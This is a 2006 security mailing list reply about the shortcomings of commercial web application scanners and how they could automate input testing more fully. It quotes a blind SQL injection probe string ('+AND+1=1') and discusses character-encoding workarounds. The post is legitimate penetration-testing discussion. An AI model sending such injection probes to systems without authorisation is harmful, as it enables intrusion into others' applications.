Dailydave mailing list archives
Re: bugs are bad.
From: "Matthew Franz" <mdfranz () gmail com>
Date: Tue, 1 Aug 2006 11:51:07 -0500
Hi Matthew, I have to agree with you there. Most folks run the automated scanners (Nessus, retina, webinspect, appscan, etc.) and then spend the majority of their time trapping requests and manually attempting injects or overflows. The problem is that the application scanner doesn't really gather and use information that would be useful for *further* automation. For example, if you're testing a blind sql injection, it isn't enough to send a "+AND+1=1" and see if the page returned is the same as the page where the bogus data wasn't sent. It'd be nice to know if the application accepts the '+' sign. And, if it doesn't accept the '+' sign, is it due to a script running within the browser (like RegularExpressionValidator), or a server-side parsing? If the former, you can (and should) still attempt to inject via manual POSTs. If the latter, then the automated scanner should attempt other encoding options to see what permuations of the '+' sign are allowed (and where). And, there are hundreds of these cases which could be built and automated. If you gather this sort of knowledge, it should mean that the manual 'trap and modify' pen-testing gets minimized (or at least lessened). And, if I'm paying thousands of bucks for a web application scanner (not to be confused with a general network scanner) then this is the sort of data that I want. Heck, I'd even like to see a table of code inputs and what dangerous chars (and their encoding) were allowed, size restrictions, etc. *That* would be freaking useful.
The other I'd like to see in commercial products is mining information from server configuration and feeding that into a scanner. For example on J2EE apps you've got a wealth of info sprinkled across dozens of XML config files. Struts-based apps also have juicy stuff about forms, variables, types, and validation mechanisms that could drive specific tests, much of it which will be in the .war I assume there is comparable stuff on the Microsoft platform... - mdf _______________________________________________ Dailydave mailing list Dailydave () lists immunitysec com http://lists.immunitysec.com/mailman/listinfo/dailydave
Current thread:
- bugs are bad. Dave Aitel (Jul 31)
- Re: bugs are bad. Jared DeMott (Jul 31)
- Re: bugs are bad. Matthew Franz (Aug 01)
- Message not available
- Re: bugs are bad. Matthew Franz (Aug 01)
- Re: bugs are bad. John Lampe (Aug 01)
- Re: bugs are bad. foofus (Aug 01)
- Re: bugs are bad. John Lampe (Aug 01)
- Re: bugs are bad. Matthew Franz (Aug 01)
- Re: bugs are bad. Jared DeMott (Jul 31)
- Re: bugs are bad. John Lampe (Aug 01)